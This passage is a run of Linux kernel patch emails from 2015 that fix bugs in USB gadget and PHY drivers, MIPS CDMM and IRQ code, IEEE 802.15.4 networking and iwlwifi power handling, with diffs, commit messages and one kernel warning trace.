IRQF_ONESHOT flag Since commit 1c6c69525b40 ("genirq: Reject bogus threaded irq requests") threaded IRQs without a primary handler need to be requested with IRQF_ONESHOT, otherwise the request will fail. So pass the IRQF_ONESHOT flag in this case. The semantic patch that makes this change is available in scripts/coccinelle/misc/irqf_oneshot.cocci. Signed-off-by: Fabio Estevam Signed-off-by: Felipe Balbi --- drivers/usb/phy/phy-ab8500-usb.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/usb/phy/phy-ab8500-usb.c b/drivers/usb/phy/phy-ab8500-usb.c index 7225d526df04..03ab0c699f74 100644 --- a/drivers/usb/phy/phy-ab8500-usb.c +++ b/drivers/usb/phy/phy-ab8500-usb.c @@ -1179,7 +1179,7 @@ static int ab8500_usb_irq_setup(struct platform_device *pdev, } err = devm_request_threaded_irq(&pdev->dev, irq, NULL, ab8500_usb_link_status_irq, - IRQF_NO_SUSPEND | IRQF_SHARED, + IRQF_NO_SUSPEND | IRQF_SHARED | IRQF_ONESHOT, "usb-link-status", ab); if (err < 0) { dev_err(ab->dev, "request_irq failed for link status irq\n"); @@ -1195,7 +1195,7 @@ static int ab8500_usb_irq_setup(struct platform_device *pdev, } err = devm_request_threaded_irq(&pdev->dev, irq, NULL, ab8500_usb_disconnect_irq, - IRQF_NO_SUSPEND | IRQF_SHARED, + IRQF_NO_SUSPEND | IRQF_SHARED | IRQF_ONESHOT, "usb-id-fall", ab); if (err < 0) { dev_err(ab->dev, "request_irq failed for ID fall irq\n"); @@ -1211,7 +1211,7 @@ static int ab8500_usb_irq_setup(struct platform_device *pdev, } err = devm_request_threaded_irq(&pdev->dev, irq, NULL, ab8500_usb_disconnect_irq, - IRQF_NO_SUSPEND | IRQF_SHARED, + IRQF_NO_SUSPEND | IRQF_SHARED | IRQF_ONESHOT, "usb-vbus-fall", ab); if (err < 0) { dev_err(ab->dev, "request_irq failed for Vbus fall irq\n"); From a81df9eedf7d29d747c86fed2402bd416bacd7a3 Mon Sep 17 00:00:00 2001 From: Fabio Estevam Date: Fri, 22 May 2015 23:28:16 -0300 Subject: [PATCH 229/872] usb: phy: tahvo: Pass the IRQF_ONESHOT flag Since commit 1c6c69525b40 ("genirq: Reject bogus threaded irq requests") threaded IRQs without a primary handler need to be requested with IRQF_ONESHOT, otherwise the request will fail. So pass the IRQF_ONESHOT flag in this case. The semantic patch that makes this change is available in scripts/coccinelle/misc/irqf_oneshot.cocci. Signed-off-by: Fabio Estevam Signed-off-by: Felipe Balbi --- drivers/usb/phy/phy-tahvo.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/usb/phy/phy-tahvo.c b/drivers/usb/phy/phy-tahvo.c index 845f658276b1..2b28443d07b9 100644 --- a/drivers/usb/phy/phy-tahvo.c +++ b/drivers/usb/phy/phy-tahvo.c @@ -401,7 +401,8 @@ static int tahvo_usb_probe(struct platform_device *pdev) dev_set_drvdata(&pdev->dev, tu); tu->irq = platform_get_irq(pdev, 0); - ret = request_threaded_irq(tu->irq, NULL, tahvo_usb_vbus_interrupt, 0, + ret = request_threaded_irq(tu->irq, NULL, tahvo_usb_vbus_interrupt, + IRQF_ONESHOT, "tahvo-vbus", tu); if (ret) { dev_err(&pdev->dev, "could not register tahvo-vbus irq: %d\n", From 459e210c4fd034d20077bcec31fec9472a700fe9 Mon Sep 17 00:00:00 2001 From: Subbaraya Sundeep Bhatta Date: Thu, 21 May 2015 15:46:46 +0530 Subject: [PATCH 230/872] usb: dwc3: gadget: Fix incorrect DEPCMD and DGCMD status macros Fixed the incorrect macro definitions correctly as per databook. Signed-off-by: Subbaraya Sundeep Bhatta Fixes: b09bb64239c8 (usb: dwc3: gadget: implement Global Command support) Cc: #v3.5+ Signed-off-by: Felipe Balbi --- drivers/usb/dwc3/core.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h index fdab715a0631..c0eafa6fd403 100644 --- a/drivers/usb/dwc3/core.h +++ b/drivers/usb/dwc3/core.h @@ -339,7 +339,7 @@ #define DWC3_DGCMD_SET_ENDPOINT_NRDY 0x0c #define DWC3_DGCMD_RUN_SOC_BUS_LOOPBACK 0x10 -#define DWC3_DGCMD_STATUS(n) (((n) >> 15) & 1) +#define DWC3_DGCMD_STATUS(n) (((n) >> 12) & 0x0F) #define DWC3_DGCMD_CMDACT (1 << 10) #define DWC3_DGCMD_CMDIOC (1 << 8) @@ -355,7 +355,7 @@ #define DWC3_DEPCMD_PARAM_SHIFT 16 #define DWC3_DEPCMD_PARAM(x) ((x) << DWC3_DEPCMD_PARAM_SHIFT) #define DWC3_DEPCMD_GET_RSC_IDX(x) (((x) >> DWC3_DEPCMD_PARAM_SHIFT) & 0x7f) -#define DWC3_DEPCMD_STATUS(x) (((x) >> 15) & 1) +#define DWC3_DEPCMD_STATUS(x) (((x) >> 12) & 0x0F) #define DWC3_DEPCMD_HIPRI_FORCERM (1 << 11) #define DWC3_DEPCMD_CMDACT (1 << 10) #define DWC3_DEPCMD_CMDIOC (1 << 8) From e21422de817ab0b67ed1902fe1383bcdeece855e Mon Sep 17 00:00:00 2001 From: James Hogan Date: Tue, 28 Apr 2015 10:57:29 +0100 Subject: [PATCH 231/872] MIPS: Fix CDMM to use native endian MMIO reads The MIPS Common Device Memory Map (CDMM) is internal to the core and has native endianness. There is therefore no need to byte swap the accesses on big endian targets, so convert the CDMM bus driver to use __raw_readl() rather than readl(). Fixes: 8286ae03308c ("MIPS: Add CDMM bus support") Signed-off-by: James Hogan Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/9904/ Signed-off-by: Ralf Baechle --- drivers/bus/mips_cdmm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/bus/mips_cdmm.c b/drivers/bus/mips_cdmm.c index 5bd792c68f9b..ab3bde16ecb4 100644 --- a/drivers/bus/mips_cdmm.c +++ b/drivers/bus/mips_cdmm.c @@ -453,7 +453,7 @@ void __iomem *mips_cdmm_early_probe(unsigned int dev_type) /* Look for a specific device type */ for (; drb < bus->drbs; drb += size + 1) { - acsr = readl(cdmm + drb * CDMM_DRB_SIZE); + acsr = __raw_readl(cdmm + drb * CDMM_DRB_SIZE); type = (acsr & CDMM_ACSR_DEVTYPE) >> CDMM_ACSR_DEVTYPE_SHIFT; if (type == dev_type) return cdmm + drb * CDMM_DRB_SIZE; @@ -500,7 +500,7 @@ static void mips_cdmm_bus_discover(struct mips_cdmm_bus *bus) bus->discovered = true; pr_info("cdmm%u discovery (%u blocks)\n", cpu, bus->drbs); for (; drb < bus->drbs; drb += size + 1) { - acsr = readl(cdmm + drb * CDMM_DRB_SIZE); + acsr = __raw_readl(cdmm + drb * CDMM_DRB_SIZE); type = (acsr & CDMM_ACSR_DEVTYPE) >> CDMM_ACSR_DEVTYPE_SHIFT; size = (acsr & CDMM_ACSR_DEVSIZE) >> CDMM_ACSR_DEVSIZE_SHIFT; rev = (acsr & CDMM_ACSR_DEVREV) >> CDMM_ACSR_DEVREV_SHIFT; From 70f041b6e1ff508750988ffd034ac6117d34d4d7 Mon Sep 17 00:00:00 2001 From: James Hogan Date: Tue, 28 Apr 2015 10:57:30 +0100 Subject: [PATCH 232/872] ttyFDC: Fix to use native endian MMIO reads The MIPS Common Device Memory Map (CDMM) is internal to the core and has native endianness. There is therefore no need to byte swap the accesses on big endian targets, so convert the Fast Debug Channel (FDC) TTY driver to use __raw_readl()/__raw_writel() rather than ioread32()/iowrite32(). Fixes: 4cebec609aea ("TTY: Add MIPS EJTAG Fast Debug Channel TTY driver") Fixes: c2d7ef51d731 ("ttyFDC: Implement KGDB IO operations.") Signed-off-by: James Hogan Cc: Ralf Baechle Cc: Jiri Slaby Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/9905/ Acked-by: Greg Kroah-Hartman Signed-off-by: Ralf Baechle --- drivers/tty/mips_ejtag_fdc.c | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/drivers/tty/mips_ejtag_fdc.c b/drivers/tty/mips_ejtag_fdc.c index 04d9e23d1ee1..358323c83b4f 100644 --- a/drivers/tty/mips_ejtag_fdc.c +++ b/drivers/tty/mips_ejtag_fdc.c @@ -174,13 +174,13 @@ struct mips_ejtag_fdc_tty { static inline void mips_ejtag_fdc_write(struct mips_ejtag_fdc_tty *priv, unsigned int offs, unsigned int data) { - iowrite32(data, priv->reg + offs); + __raw_writel(data, priv->reg + offs); } static inline unsigned int mips_ejtag_fdc_read(struct mips_ejtag_fdc_tty *priv, unsigned int offs) { - return ioread32(priv->reg + offs); + return __raw_readl(priv->reg + offs); } /* Encoding of byte stream in FDC words */ @@ -347,9 +347,9 @@ static void mips_ejtag_fdc_console_write(struct console *c, const char *s, s += inc[word.bytes - 1]; /* Busy wait until there's space in fifo */ - while (ioread32(regs + REG_FDSTAT) & REG_FDSTAT_TXF) + while (__raw_readl(regs + REG_FDSTAT) & REG_FDSTAT_TXF) ; - iowrite32(word.word, regs + REG_FDTX(c->index)); + __raw_writel(word.word, regs + REG_FDTX(c->index)); } out: local_irq_restore(flags); @@ -1227,7 +1227,7 @@ static int kgdbfdc_read_char(void) /* Read next word from KGDB channel */ do { - stat = ioread32(regs + REG_FDSTAT); + stat = __raw_readl(regs + REG_FDSTAT); /* No data waiting? */ if (stat & REG_FDSTAT_RXE) @@ -1236,7 +1236,7 @@ static int kgdbfdc_read_char(void) /* Read next word */ channel = (stat & REG_FDSTAT_RXCHAN) >> REG_FDSTAT_RXCHAN_SHIFT; - data = ioread32(regs + REG_FDRX); + data = __raw_readl(regs + REG_FDRX); } while (channel != CONFIG_MIPS_EJTAG_FDC_KGDB_CHAN); /* Decode into rbuf */ @@ -1266,9 +1266,10 @@ static void kgdbfdc_push_one(void) return; /* Busy wait until there's space in fifo */ - while (ioread32(regs + REG_FDSTAT) & REG_FDSTAT_TXF) + while (__raw_readl(regs + REG_FDSTAT) & REG_FDSTAT_TXF) ; - iowrite32(word.word, regs + REG_FDTX(CONFIG_MIPS_EJTAG_FDC_KGDB_CHAN)); + __raw_writel(word.word, + regs + REG_FDTX(CONFIG_MIPS_EJTAG_FDC_KGDB_CHAN)); } /* flush the whole write buffer to the TX FIFO */ From 884e7e5e7d1a35b944436895852d5ed24e79d42e Mon Sep 17 00:00:00 2001 From: Joe Perches Date: Wed, 20 May 2015 05:44:54 -0700 Subject: [PATCH 233/872] MIPS: irq: Use DECLARE_BITMAP Use the generic mechanism to declare a bitmap instead of unsigned long. This could fix an overwrite defect of whatever follows irq_map. Not all "#define NR_IRQS " are a multiple of BITS_PER_LONG so using DECLARE_BITMAP allocates the proper number of longs required for the possible bits. For instance: arch/mips/include/asm/mach-ath79/irq.h:#define NR_IRQS 51 arch/mips/include/asm/mach-db1x00/irq.h:#define NR_IRQS 152 arch/mips/include/asm/mach-lantiq/falcon/irq.h:#define NR_IRQS 328 Signed-off-by: Joe Perches Cc: linux-mips Cc: LKML Cc: Gabor Juhos Cc: Manuel Lauss Cc: John Crispin Patchwork: https://patchwork.linux-mips.org/patch/10091/ Signed-off-by: Ralf Baechle --- arch/mips/kernel/irq.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kernel/irq.c b/arch/mips/kernel/irq.c index d2bfbc2e8995..51f57d841662 100644 --- a/arch/mips/kernel/irq.c +++ b/arch/mips/kernel/irq.c @@ -29,7 +29,7 @@ int kgdb_early_setup; #endif -static unsigned long irq_map[NR_IRQS / BITS_PER_LONG]; +static DECLARE_BITMAP(irq_map, NR_IRQS); int allocate_irqno(void) { From 5767b52c47488e288c6b6f94e4739e1fdfdf4e81 Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Tue, 26 May 2015 12:54:18 +0200 Subject: [PATCH 234/872] MIPS: Fuloong 2E: Replace CONFIG_USB_ISP1760_HCD by CONFIG_USB_ISP1760 Since commit 100832abf065bc18 ("usb: isp1760: Make HCD support optional"), CONFIG_USB_ISP1760_HCD is automatically selected when needed. Enabling that option in the defconfig is now a no-op, and no longer enables ISP1760 HCD support. Re-enable the ISP1760 driver in the defconfig by enabling USB_ISP1760_HOST_ROLE instead. Signed-off-by: Geert Uytterhoeven Cc: Laurent Pinchart Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10180/ Signed-off-by: Ralf Baechle --- arch/mips/configs/fuloong2e_defconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/configs/fuloong2e_defconfig b/arch/mips/configs/fuloong2e_defconfig index 002680648dcb..b2a577ebce0b 100644 --- a/arch/mips/configs/fuloong2e_defconfig +++ b/arch/mips/configs/fuloong2e_defconfig @@ -194,7 +194,7 @@ CONFIG_USB_WUSB_CBAF=m CONFIG_USB_C67X00_HCD=m CONFIG_USB_EHCI_HCD=y CONFIG_USB_EHCI_ROOT_HUB_TT=y -CONFIG_USB_ISP1760_HCD=m +CONFIG_USB_ISP1760=m CONFIG_USB_OHCI_HCD=y CONFIG_USB_UHCI_HCD=m CONFIG_USB_R8A66597_HCD=m From 10f095801cda5cdf24839e2fe90c08cb85a28da6 Mon Sep 17 00:00:00 2001 From: Sergiy Kibrik Date: Sat, 16 May 2015 16:55:03 +0300 Subject: [PATCH 235/872] usb: s3c2410_udc: correct reversed pullup logic For some reason the code has always been disabling pullup when asked to do the opposite. According to surrounding code and gadget API this seems to be a mistake. This fix allows UDC to be detected by host controller on recent kernels. Signed-off-by: Sergiy Kibrik Signed-off-by: Felipe Balbi --- drivers/usb/gadget/udc/s3c2410_udc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/usb/gadget/udc/s3c2410_udc.c b/drivers/usb/gadget/udc/s3c2410_udc.c index b808951491cc..99fd9a5667df 100644 --- a/drivers/usb/gadget/udc/s3c2410_udc.c +++ b/drivers/usb/gadget/udc/s3c2410_udc.c @@ -1487,7 +1487,7 @@ static int s3c2410_udc_pullup(struct usb_gadget *gadget, int is_on) dprintk(DEBUG_NORMAL, "%s()\n", __func__); - s3c2410_udc_set_pullup(udc, is_on ? 0 : 1); + s3c2410_udc_set_pullup(udc, is_on); return 0; } From c41b33c58d11f32e95d06f634ddba0cbf39fc7c6 Mon Sep 17 00:00:00 2001 From: Krzysztof Opasiak Date: Fri, 22 May 2015 17:25:17 +0200 Subject: [PATCH 236/872] usb: gadget: g_ffs: Fix counting of missing_functions Returning non-zero value from ready callback makes ffs instance return error from writing strings and enter FFS_CLOSING state. This means that this this function is not truly ready and close callback will not be called. This commit fix ffs_ready_callback() to undo all side effects of this function in case of error. Signed-off-by: Krzysztof Opasiak Signed-off-by: Felipe Balbi --- drivers/usb/gadget/legacy/g_ffs.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/usb/gadget/legacy/g_ffs.c b/drivers/usb/gadget/legacy/g_ffs.c index 7b9ef7e257d2..e821931c965c 100644 --- a/drivers/usb/gadget/legacy/g_ffs.c +++ b/drivers/usb/gadget/legacy/g_ffs.c @@ -304,8 +304,10 @@ static int functionfs_ready_callback(struct ffs_data *ffs) gfs_registered = true; ret = usb_composite_probe(&gfs_driver); - if (unlikely(ret < 0)) + if (unlikely(ret < 0)) { + ++missing_funcs; gfs_registered = false; + } return ret; } From 49a79d8b0a5f8239b8424a3eb730006faada0ad8 Mon Sep 17 00:00:00 2001 From: Krzysztof Opasiak Date: Fri, 22 May 2015 17:25:18 +0200 Subject: [PATCH 237/872] usb: gadget: ffs: fix: Always call ffs_closed() in ffs_data_clear() Originally FFS_FL_CALL_CLOSED_CALLBACK flag has been used to indicate if we should call ffs_closed_callback(). Commit 4b187fceec3c ("usb: gadget: FunctionFS: add devices management code") changed its semantic to indicate if we should call ffs_closed() function which does a little bit more. This situation leads to: [ 122.362269] ------------[ cut here ]------------ [ 122.362287] WARNING: CPU: 2 PID: 2384 at drivers/usb/gadget/function/f_fs.c:3417 ffs_ep0_write+0x730/0x810 [usb_f_fs]() [ 122.362292] Modules linked in: [ 122.362555] CPU: 2 PID: 2384 Comm: adbd Tainted: G W 4.1.0-0.rc4.git0.1.1.fc22.i686 #1 [ 122.362561] Hardware name: To be filled by O.E.M. To be filled by O.E.M./Aptio CRB, BIOS 5.6.5 07/25/2014 [ 122.362567] c0d1f947 415badfa 00000000 d1029e64 c0a86e54 00000000 d1029e94 c045b937 [ 122.362584] c0c37f94 00000002 00000950 f9b313d4 00000d59 f9b2ebf0 f9b2ebf0 fffffff0 [ 122.362600] 00000003 deb53d00 d1029ea4 c045ba42 00000009 00000000 d1029f08 f9b2ebf0 [ 122.362617] Call Trace: [ 122.362633] [] dump_stack+0x41/0x52 [ 122.362645] [] warn_slowpath_common+0x87/0xc0 [ 122.362658] [] ? ffs_ep0_write+0x730/0x810 [usb_f_fs] [ 122.362668] [] ? ffs_ep0_write+0x730/0x810 [usb_f_fs] [ 122.362678] [] warn_slowpath_null+0x22/0x30 [ 122.362689] [] ffs_ep0_write+0x730/0x810 [usb_f_fs] [ 122.362702] [] ? ffs_ep0_read+0x380/0x380 [usb_f_fs] [ 122.362712] [] __vfs_write+0x2f/0x100 [ 122.362722] [] ? __sb_start_write+0x52/0x110 [ 122.362731] [] vfs_write+0x94/0x1b0 [ 122.362740] [] ? mutex_lock+0x10/0x30 [ 122.362749] [] SyS_write+0x51/0xb0 [ 122.362759] [] sysenter_do_call+0x12/0x12 [ 122.362766] ---[ end trace 0673d3467cecf8db ]--- in some cases (reproduction path below). This commit get back semantic of that flag and ensures that ffs_closed() is called always when needed but ffs_closed_callback() is called only if this flag is set. Reproduction path: Compile kernel without any UDC driver or bound some gadget to existing one and then: $ modprobe g_ffs $ mount none -t functionfs mount_point $ ffs-example mount_point This will fail with -ENODEV as there is no udc. $ ffs-example mount_point This will fail with -EBUSY because ffs_data has not been properly cleaned up. Signed-off-by: Krzysztof Opasiak Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_fs.c | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c index 6bdb57069044..71f68c48103e 100644 --- a/drivers/usb/gadget/function/f_fs.c +++ b/drivers/usb/gadget/function/f_fs.c @@ -315,7 +315,6 @@ static ssize_t ffs_ep0_write(struct file *file, const char __user *buf, return ret; } - set_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags); return len; } break; @@ -1463,8 +1462,7 @@ static void ffs_data_clear(struct ffs_data *ffs) { ENTER(); - if (test_and_clear_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags)) - ffs_closed(ffs); + ffs_closed(ffs); BUG_ON(ffs->gadget); @@ -3422,9 +3420,13 @@ static int ffs_ready(struct ffs_data *ffs) ffs_obj->desc_ready = true; ffs_obj->ffs_data = ffs; - if (ffs_obj->ffs_ready_callback) + if (ffs_obj->ffs_ready_callback) { ret = ffs_obj->ffs_ready_callback(ffs); + if (ret) + goto done; + } + set_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags); done: ffs_dev_unlock(); return ret; @@ -3443,7 +3445,8 @@ static void ffs_closed(struct ffs_data *ffs) ffs_obj->desc_ready = false; - if (ffs_obj->ffs_closed_callback) + if (test_and_clear_bit(FFS_FL_CALL_CLOSED_CALLBACK, &ffs->flags) && + ffs_obj->ffs_closed_callback) ffs_obj->ffs_closed_callback(ffs); if (!ffs_obj->opts || ffs_obj->opts->no_configfs From ca4de53c522f261e84efb659a07435bd1a5a8828 Mon Sep 17 00:00:00 2001 From: Michael Trimarchi Date: Mon, 18 May 2015 17:28:58 +0200 Subject: [PATCH 238/872] usb: gadget: f_uac1: check return code from config_ep_by_speed Not checking config_ep_by_speed could lead to a kernel NULL pointer dereference error in usb_ep_enable Cc: Felipe Balbi Signed-off-by: Michael Trimarchi Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_uac1.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/usb/gadget/function/f_uac1.c b/drivers/usb/gadget/function/f_uac1.c index 9719abfb6145..7856b3394494 100644 --- a/drivers/usb/gadget/function/f_uac1.c +++ b/drivers/usb/gadget/function/f_uac1.c @@ -588,7 +588,10 @@ static int f_audio_set_alt(struct usb_function *f, unsigned intf, unsigned alt) if (intf == 1) { if (alt == 1) { - config_ep_by_speed(cdev->gadget, f, out_ep); + err = config_ep_by_speed(cdev->gadget, f, out_ep); + if (err) + return err; + usb_ep_enable(out_ep); out_ep->driver_data = audio; audio->copy_buf = f_audio_buffer_alloc(audio_buf_size); From da96cfc133350024ba68ef3289faeb539ee13872 Mon Sep 17 00:00:00 2001 From: Ben Hutchings Date: Sun, 24 May 2015 04:27:32 +0100 Subject: [PATCH 239/872] usb: musb: fix order of conditions for assigning end point operations Currently we always assign one of the two common implementations of ep_offset and ep_select operations, overwriting any platform-specific implementations. Fixes: d026e9c76aac ("usb: musb: Change end point selection to use ...") Signed-off-by: Ben Hutchings Signed-off-by: Felipe Balbi --- drivers/usb/musb/musb_core.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/usb/musb/musb_core.c b/drivers/usb/musb/musb_core.c index 3789b08ef67b..6dca3d794ced 100644 --- a/drivers/usb/musb/musb_core.c +++ b/drivers/usb/musb/musb_core.c @@ -2021,13 +2021,7 @@ musb_init_controller(struct device *dev, int nIrq, void __iomem *ctrl) if (musb->ops->quirks) musb->io.quirks = musb->ops->quirks; - /* At least tusb6010 has it's own offsets.. */ - if (musb->ops->ep_offset) - musb->io.ep_offset = musb->ops->ep_offset; - if (musb->ops->ep_select) - musb->io.ep_select = musb->ops->ep_select; - - /* ..and some devices use indexed offset or flat offset */ + /* Most devices use indexed offset or flat offset */ if (musb->io.quirks & MUSB_INDEXED_EP) { musb->io.ep_offset = musb_indexed_ep_offset; musb->io.ep_select = musb_indexed_ep_select; @@ -2036,6 +2030,12 @@ musb_init_controller(struct device *dev, int nIrq, void __iomem *ctrl) musb->io.ep_select = musb_flat_ep_select; } + /* At least tusb6010 has its own offsets */ + if (musb->ops->ep_offset) + musb->io.ep_offset = musb->ops->ep_offset; + if (musb->ops->ep_select) + musb->io.ep_select = musb->ops->ep_select; + if (musb->ops->fifo_mode) fifo_mode = musb->ops->fifo_mode; else From 342f39a6c8d34d638a87b7d5f2156adc4db2585c Mon Sep 17 00:00:00 2001 From: Rui Miguel Silva Date: Wed, 20 May 2015 14:53:33 +0100 Subject: [PATCH 240/872] usb: gadget: f_fs: fix check in read operation when copying to iter the size can be different then the iov count, the check for full iov is wrong and make any read on request which is not the exactly size of iov to return -EFAULT. So, just check the success of the copy. Signed-off-by: Rui Miguel Silva Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_fs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c index 71f68c48103e..3507f880eb74 100644 --- a/drivers/usb/gadget/function/f_fs.c +++ b/drivers/usb/gadget/function/f_fs.c @@ -846,7 +846,7 @@ static ssize_t ffs_epfile_io(struct file *file, struct ffs_io_data *io_data) ret = ep->status; if (io_data->read && ret > 0) { ret = copy_to_iter(data, ret, &io_data->data); - if (unlikely(iov_iter_count(&io_data->data))) + if (!ret) ret = -EFAULT; } } From e73d42f15f90614538edeb5d4102f847105f86f2 Mon Sep 17 00:00:00 2001 From: Kazuya Mizuguchi Date: Tue, 26 May 2015 20:13:42 +0900 Subject: [PATCH 241/872] usb: renesas_usbhs: Fix fifo unclear in usbhsf_prepare_pop This patch fixes an issue for control write. When usbhsf_prepare_pop() is called after this driver called a gadget setup function, this controller doesn't receive the control write data. So, this patch adds a code to clear the fifo for control write in usbhsf_prepare_pop(). Signed-off-by: Kazuya Mizuguchi Signed-off-by: Yoshihiro Shimoda Signed-off-by: Felipe Balbi --- drivers/usb/renesas_usbhs/fifo.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/usb/renesas_usbhs/fifo.c b/drivers/usb/renesas_usbhs/fifo.c index bc23b4a2c415..0bad84ebe9aa 100644 --- a/drivers/usb/renesas_usbhs/fifo.c +++ b/drivers/usb/renesas_usbhs/fifo.c @@ -611,6 +611,8 @@ struct usbhs_pkt_handle usbhs_fifo_pio_push_handler = { static int usbhsf_prepare_pop(struct usbhs_pkt *pkt, int *is_done) { struct usbhs_pipe *pipe = pkt->pipe; + struct usbhs_priv *priv = usbhs_pipe_to_priv(pipe); + struct usbhs_fifo *fifo = usbhsf_get_cfifo(priv); if (usbhs_pipe_is_busy(pipe)) return 0; @@ -624,6 +626,9 @@ static int usbhsf_prepare_pop(struct usbhs_pkt *pkt, int *is_done) usbhs_pipe_data_sequence(pipe, pkt->sequence); pkt->sequence = -1; /* -1 sequence will be ignored */ + if (usbhs_pipe_is_dcp(pipe)) + usbhsf_fifo_clear(pipe, fifo); + usbhs_pipe_set_trans_count_if_bulk(pipe, pkt->length); usbhs_pipe_enable(pipe); usbhs_pipe_running(pipe, 1); From 93fb9127cb63a3246b32d48fa273010764687862 Mon Sep 17 00:00:00 2001 From: Yoshihiro Shimoda Date: Tue, 26 May 2015 20:13:43 +0900 Subject: [PATCH 242/872] usb: renesas_usbhs: Don't disable the pipe if Control write status stage This patch fixes an issue that sometimes this controller is not able to complete the Control write status stage. This driver should enable DCPCTR.CCPL and PID_BUF to complete the status stage. However, if this driver detects the ctrl_stage interruption first before the control write data is received, this driver will clear the PID_BUF wrongly in the usbhsf_pio_try_pop(). To avoid this issue, this patch doesn't clear the PID_BUF in the usbhsf_pio_try_pop(). (Since also the privious code doesn't disable the PID_BUF after a control transfer was finished, this patch doesn't have any side efforts.) Signed-off-by: Yoshihiro Shimoda Signed-off-by: Felipe Balbi --- drivers/usb/renesas_usbhs/fifo.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/usb/renesas_usbhs/fifo.c b/drivers/usb/renesas_usbhs/fifo.c index 0bad84ebe9aa..c0f5c652d272 100644 --- a/drivers/usb/renesas_usbhs/fifo.c +++ b/drivers/usb/renesas_usbhs/fifo.c @@ -678,7 +678,14 @@ static int usbhsf_pio_try_pop(struct usbhs_pkt *pkt, int *is_done) *is_done = 1; usbhsf_rx_irq_ctrl(pipe, 0); usbhs_pipe_running(pipe, 0); - usbhs_pipe_disable(pipe); /* disable pipe first */ + /* + * If function mode, since this controller is possible to enter + * Control Write status stage at this timing, this driver + * should not disable the pipe. If such a case happens, this + * controller is not able to complete the status stage. + */ + if (!usbhs_mod_is_host(priv) && !usbhs_pipe_is_dcp(pipe)) + usbhs_pipe_disable(pipe); /* disable pipe first */ } /* From e34fd879f5516496c7241c9c2caf3a108295a30c Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Tue, 26 May 2015 15:06:10 +0300 Subject: [PATCH 243/872] mac802154: Avoid rtnl deadlock in mac802154_wpan_ioctl(). ->ndo_do_ioctl() can be entered with the rtnl lock already held, for example when sending a wext ioctl to a device (in which case the rtnl lock is taken by wext_ioctl_dispatch()), but mac802154_wpan_ioctl() currently unconditionally takes the rtnl lock on entry, which can cause deadlocks. To fix this, bail out of mac802154_wpan_ioctl() before taking the rtnl lock if the ioctl cmd is not one of the cmds we implement. Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/mac802154/iface.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index f30788d2702f..b544b5dc4bfb 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -62,6 +62,9 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) (struct sockaddr_ieee802154 *)&ifr->ifr_addr; int err = -ENOIOCTLCMD; + if (cmd != SIOCGIFADDR && cmd != SIOCSIFADDR) + return err; + rtnl_lock(); switch (cmd) { From c032705ebfed32a6dcda72d83c54f060d4bf1e6e Mon Sep 17 00:00:00 2001 From: Lennert Buytenhek Date: Mon, 25 May 2015 15:38:24 +0300 Subject: [PATCH 244/872] ieee802154 socket: Return EMSGSIZE from raw_sendmsg() if packet too big. The proper return code for trying to send a packet that exceeds the outgoing interface's MTU is EMSGSIZE, not EINVAL, so patch ieee802154's raw_sendmsg() to do the right thing. (Its dgram_sendmsg() was already returning EMSGSIZE for this case.) Signed-off-by: Lennert Buytenhek Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/socket.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ieee802154/socket.c b/net/ieee802154/socket.c index e5cc2537c2a3..d9fc5ccb1d0d 100644 --- a/net/ieee802154/socket.c +++ b/net/ieee802154/socket.c @@ -284,7 +284,7 @@ static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size) if (size > mtu) { pr_debug("size = %Zu, mtu = %u\n", size, mtu); - err = -EINVAL; + err = -EMSGSIZE; goto out_dev; } From a61408e9a48e7634984408e334b125a72726440e Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Mon, 27 Apr 2015 21:38:10 +0300 Subject: [PATCH 245/872] iwlwifi: pcie: don't call set_pwr functions for family 8000 We should not call the iwl_pcie_set_pwr() functions in the suspend/resume flows for family 8000, because the register used is locked in devices from this family. Doing this causes an NMI protection error (RT_NMI_INTERRUPT_PREG_PROTECTION). To fix this, skip those calls if the device family is IWL_DEVICE_FAMILY_8000. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: 